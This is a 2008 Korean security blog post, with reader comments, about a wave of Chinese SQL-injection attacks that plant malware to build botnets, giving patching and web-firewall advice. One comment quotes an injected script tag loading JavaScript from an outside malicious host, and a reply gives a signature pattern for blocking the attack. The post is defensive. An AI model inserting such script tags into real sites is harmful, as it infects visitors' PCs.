최근 벌어지는 중국발 SQL 삽입 악성코드 공격은 공격 기법과 탐지 패턴이 다 공개되었고, 이들이 쓰는 실탄(악성코드)까지 다 수집이 되어 있습니다. 순수하게 기술적인 측면에서만 말하자면 한물간 공격이라고 볼 수 있겠죠.
그럼에도 주말도 없이 밤샘해가면서 한물간 공격을 계속 시도하는 이유는 '서버 장악'이 목적이 아니라, 악성코드 감염을 통한 '좀비PC 장악'이 목적이기 때문입니다. 한대라도 더 감염시키려면 부지런히 뛰어야겠죠.
본래 중국쪽의 2~3명 정도가 봇넷을 형성해서 CNN 사이트와 프랑스쪽 사이트에 본 때를 보여주려던게 아닌가 싶은데, 미국애까지 옛날 exploit 들고 뛰어들어서 상황이 어떻게 될지 모르겠습니다. 현재 미국애쪽 툴이 빠른 속도로 지배력을 확장해나가고 있는 추세입니다만, 옛날 소스라 한계가 있지 않을까 싶습니다.
미국애의 의도가 무엇인지 모르겠으나 잘못하면 중국과 미국 간에 봇넷 vs 봇넷 전쟁이 벌어질 수도 있고, CNN 사이트 DDoS 는 기정사실이 아닐까 합니다.
이 과정에서 여러분의 개인 PC 가 해킹에 동원될 수 있으며, 국가적 차원에서는 현저한 네트워크 속도 저하, 해외망 접속 비용 증가가 발생하게 됩니다.
개인 사용자 대처 방안
1. MS 윈도우의 최신 보안 패치를 적용한다.
2. PC에 설치된 소프트웨어(오피스, 음악/동영상 플레이어, InternetExplorer 의 ActiveX 등)의 최신 보안 패치를 적용한다.
3. PC에 반드시 백신을 설치한다.
4. 백신의 업데이트 기능을 이용해 최신 패턴으로 업데이트한다.
5. PC가 느리면 당분간 만이라도 실시간 감시 기능을 꼭 켜둔다.
6. 매일 1회 바이러스 검사를 한다(예약 검사 기능으로 점심 시간에 맞춰두고 식사하고 돌아오면 O.K.)
서버 관리자 대처 방안
1. 피해 발생 시 신속히 복구한다.
2. SQL injection 에 언제든 다시 피해를 입을 수 있으므로, 취약 소스 수정, 웹 방화벽 도입, IDS/IPS 를 이용한 SQL 쿼리 필터링 등 보다 근본적인 대처 방안을 적용한다.
정부측에서 기존에 차단 조치된 사이트 외에 추가적으로 차단 조치하는 것이 바람직한지에 대해서는 아직 판단이 안서는군요. 서버쪽 피해 규모가 기존에 비해 아직 소규모라서...
여러분의 소중한 PC가 악성코드에 오염되지 않도록 소중히 지켜주길 바래요~
부디 제 걱정이 기우로 끝났으면 하는 마음입니다.
이글루스 가든 - professional secur...
그럼에도 주말도 없이 밤샘해가면서 한물간 공격을 계속 시도하는 이유는 '서버 장악'이 목적이 아니라, 악성코드 감염을 통한 '좀비PC 장악'이 목적이기 때문입니다. 한대라도 더 감염시키려면 부지런히 뛰어야겠죠.
본래 중국쪽의 2~3명 정도가 봇넷을 형성해서 CNN 사이트와 프랑스쪽 사이트에 본 때를 보여주려던게 아닌가 싶은데, 미국애까지 옛날 exploit 들고 뛰어들어서 상황이 어떻게 될지 모르겠습니다. 현재 미국애쪽 툴이 빠른 속도로 지배력을 확장해나가고 있는 추세입니다만, 옛날 소스라 한계가 있지 않을까 싶습니다.
미국애의 의도가 무엇인지 모르겠으나 잘못하면 중국과 미국 간에 봇넷 vs 봇넷 전쟁이 벌어질 수도 있고, CNN 사이트 DDoS 는 기정사실이 아닐까 합니다.
이 과정에서 여러분의 개인 PC 가 해킹에 동원될 수 있으며, 국가적 차원에서는 현저한 네트워크 속도 저하, 해외망 접속 비용 증가가 발생하게 됩니다.
개인 사용자 대처 방안
1. MS 윈도우의 최신 보안 패치를 적용한다.
2. PC에 설치된 소프트웨어(오피스, 음악/동영상 플레이어, InternetExplorer 의 ActiveX 등)의 최신 보안 패치를 적용한다.
3. PC에 반드시 백신을 설치한다.
4. 백신의 업데이트 기능을 이용해 최신 패턴으로 업데이트한다.
5. PC가 느리면 당분간 만이라도 실시간 감시 기능을 꼭 켜둔다.
6. 매일 1회 바이러스 검사를 한다(예약 검사 기능으로 점심 시간에 맞춰두고 식사하고 돌아오면 O.K.)
서버 관리자 대처 방안
1. 피해 발생 시 신속히 복구한다.
2. SQL injection 에 언제든 다시 피해를 입을 수 있으므로, 취약 소스 수정, 웹 방화벽 도입, IDS/IPS 를 이용한 SQL 쿼리 필터링 등 보다 근본적인 대처 방안을 적용한다.
정부측에서 기존에 차단 조치된 사이트 외에 추가적으로 차단 조치하는 것이 바람직한지에 대해서는 아직 판단이 안서는군요. 서버쪽 피해 규모가 기존에 비해 아직 소규모라서...
여러분의 소중한 PC가 악성코드에 오염되지 않도록 소중히 지켜주길 바래요~
부디 제 걱정이 기우로 끝났으면 하는 마음입니다.
이글루스 가든 - professional secur...
덧글
천체관측 2008/05/12 01:55 # 답글
보이지 않는 두 국가의 전쟁이로군요...유료 백신의 구매를 고민하고 있었는데 요즘 들어서 보면 정말로
빨리 구해야겠다라고 생각이 듭니다
미키맨틀 2008/05/12 11:31 # 삭제 답글
저기 죄송한데요. 질문이 좀 ^^위에서 말씀하신 바이러스 검사는 유료 검사만 말씀하실 것입니까?( 안램에서 무료 검사만 해와서-_-)
노을 2008/05/12 11:50 # 삭제 답글
안랩의 V3 는 사용하지 마세요. 자살행위 입니다.
미르 2008/05/12 12:31 # 삭제 답글
많은 정보를 얻고 갑니다. ^^ 감사 드립니다.혹시 <script src=<script src=http://www.wowgm1.cn/m.js></script> 이런 내용이 게시판 DB에 들어간 경우는 어떤 건가요? 데이터를 일정 자릿수 만큼 잘라버리고 위의 스크립트가 삽입되어 있습니다.
재감염을 막기위해 소스를 수정해야 한다면 어떤 형태로 수정해야 하는지 참고 자료가 있으면 소개부탁드립니다. 근본적인 해결책을 찾질 못하고 있습니다.
꾸벅...
헐랭이 2008/05/12 13:04 # 답글
미르// wowgm1.cn 도 역시 같은 기법 맞습니다. 소스는 각 회사마다 다르기 때문에 일괄적으로 말씀드리긴 어렵습니다만, KISA 홈페이지 개발보안가이드(http://pds2.egloos.com/pds/200610/12/20/050407-homefagesafetyguide.pdf) 의 68~73 페이지까지 보시면 대강의 대책이 나옵니다. 저 자료가 보기 불편하신 분은 http://dcmru.tistory.com/attachment/804805.doc 이 자료 보셔도 되구요.좋은 해결책을 찾으셨으면 좋겠습니다.
헐랭이 2008/05/12 13:10 # 답글
좀 오래된 자료이지만, 'WebKnight 를 이용한 SQL injection 공격 차단 (http://www.krcert.or.kr/docDown.jsp?dn=7)' 이라는 자료도 참고해보시면 좋겠네요. 실환경에서 오류가 발생하지 않는지 미리 테스트해보시고 적용해보시는게 좋고, 최신 버전인 2.1 버전을 설치하셔야 합니다.이번 공격의 차단 패턴은 'S=CAST(0x40' 을 등록하시면 무난할 듯...
헐랭이 2008/05/12 13:14 # 답글
아참, 웹방화벽 설치 시 HTTP 패킷을 모니터링하여 걸러내는 과정에서 약간의 속도 저하가 발생하는 점 잊지 마세요.